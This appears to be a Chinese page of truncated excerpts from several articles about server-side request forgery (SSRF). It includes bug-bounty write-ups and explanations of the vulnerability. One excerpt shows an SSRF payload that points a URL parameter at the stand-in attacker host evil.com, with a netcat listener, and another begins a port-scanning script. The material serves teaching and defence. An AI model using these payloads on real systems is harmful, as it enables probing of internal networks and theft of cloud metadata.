Fly_鹏程万里

本文将向大家分享一个新的非常有意思的漏洞。利用该漏洞可以为我们泄漏云环境中的Metadata数据，并进一步的实现远程代码执行（RCE ）。测试范围在对该站点进行子域枚举时，我找到了[docs.redact.com]这个子域。查找带外资源加载[docs]子域名显示了一些文档和统计信息在点击统计数据的照片时，我看到了一些奇怪的链接：我想到的第一件事就是将[url]的值改...

SSRF漏洞是如何产生的SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF是要目标网站的内部系统。（因为他是从内部系统访问的，所有可以通过它攻击外网无法访问的内部系统，也就是把目标网站当中间人）SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址...

看到微博SRC做活动，严重级别漏洞额外奖励5000现金，于是花了接近一晚上找到这个洞。漏洞报告给微博后，由于是微博收到的第一个严重漏洞导致他们运营无法理解漏洞具体危害场景及影响范围，解释一通最终奖励了￥5,000现金和2000积分。0x01 找切入点用WebProxy抓到一处URL中带URL的请求：http://zhifu.game.weibo.com/topay.php。参数中pay...

SSRF PHP functionfile_get_contents()fsockopen()curl_exec()URL schema supportSFTPhttp://safebuff.com/ssrf.php?url=sftp://evil.com:11111/evil.com:$ nc -v -l 11111Connection from [192.1...

扫描本机开放的端口：#!/usr/bin/env python# -*- coding: utf-8 -*-# @Author: Lcy# @Date: 2016-07-05 20:55:30# @Last Modified by: Lcy# @Last Modified time: 2016-10-10 16:26:14import requestsimport th...

一、SSRF简介SSRF（Server-Side Request Forgery，服务器端请求伪造）：通俗的来说就是我们可以伪造服务器端发起的请求，从而获取客户端所不能得到的数据。SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求的内容的URL参数，并且未对客户端所传输过来的URL参数进行过滤。这个漏洞造成的危害有：(1)、可以对外网、服务器所在内网、本地进行端口扫描，获取...

漏洞简介SSRF(Server-side Request Forge, 服务端请求伪造)。由攻击者构造的攻击链接传给服务端执行造成的漏洞，一般用来在外网探测或攻击内网服务。漏洞利用SSRF利用存在多种形式以及不同的场景，针对不同场景可以使用不同的绕过方式。本地利用拿常用的cURL举例，cURL默认支持的协议非常多。$ curl -Vcurl 7.47.1 (x86_6...

SSRF概述SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比...

ssrf攻击概述很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击（Server-side Request Forgery）。比如下图显示的就是提供这种功能的典型应用：如果应用程序对用户提...